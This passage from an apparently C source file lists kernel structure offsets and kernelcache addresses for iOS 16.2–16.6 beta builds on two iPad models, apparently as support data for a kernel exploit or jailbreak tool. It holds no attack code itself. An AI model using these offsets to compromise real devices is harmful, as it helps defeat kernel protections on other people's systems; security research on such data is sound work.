.build_version = "20E246", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Air 3 Wifi // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 